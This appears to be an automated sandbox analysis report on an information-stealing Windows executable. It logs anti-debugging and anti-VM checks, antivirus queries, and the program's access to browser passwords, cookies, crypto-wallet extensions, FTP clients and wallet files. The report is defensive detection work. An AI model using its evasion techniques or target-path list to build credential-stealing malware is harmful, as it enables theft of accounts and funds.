        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F302D2 second address: 5F302D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F302D8 second address: 5F30309 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F590909A3F1h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F590909A3F9h 0x00000012 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F303E0 second address: 5F30418 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5908B64E6Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a xchg eax, ebx 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007F5908B64E68h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 00000015h 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 nop 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b pop eax 0x0000002c rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F30418 second address: 5F30422 instructions: 0x00000000 rdtsc 0x00000002 js 00007F590909A3E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F3095E second address: 5F30966 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
        Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: BCC946 instructions caused by: Self-modifying code
        Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: D72344 instructions caused by: Self-modifying code
        Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: D7B465 instructions caused by: Self-modifying code
        Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5D7DC71 instructions caused by: Self-modifying code
        Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5D7B14A instructions caused by: Self-modifying code
        Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5F4FD76 instructions caused by: Self-modifying code
        Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5F3876C instructions caused by: Self-modifying code
        Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5FBA3E5 instructions caused by: Self-modifying code
        Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
        Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
        Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
        Source: C:\Users\user\Desktop\file.exe TID: 7324Thread sleep time: -36018s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\file.exe TID: 7392Thread sleep time: -32000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\file.exe TID: 7396Thread sleep time: -240000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\file.exe TID: 7300Thread sleep time: -32016s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\file.exe TID: 7312Thread sleep time: -38019s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\file.exe TID: 7308Thread sleep time: -42021s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
        Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

        Anti Debugging

        barindex
        Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
        Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
        Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
        Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
        Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
        Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
        Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
        Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
        Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
        Source: C:\Users\user\Desktop\file.exeFile opened: SICE
        Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
        Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        Source: file.exe, file.exe, 00000000.00000003.1934018659.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1919782334.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1933712433.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1919604227.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2066625567.00000000007D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
        Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: Process Memory Space: file.exe PID: 7280, type: MEMORYSTR
        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
        Source: file.exe, 00000000.00000003.1892170394.00000000007E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: :"%appdata%\\ElectronCash\\wallek
        Source: file.exeString found in binary or memory: Jaxx Liberty
        Source: file.exe, 00000000.00000003.1892569757.00000000007E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Exodus
        Source: file.exe, 00000000.00000003.1892569757.00000000007E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
        Source: file.exe, 00000000.00000003.1892569757.00000000007E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
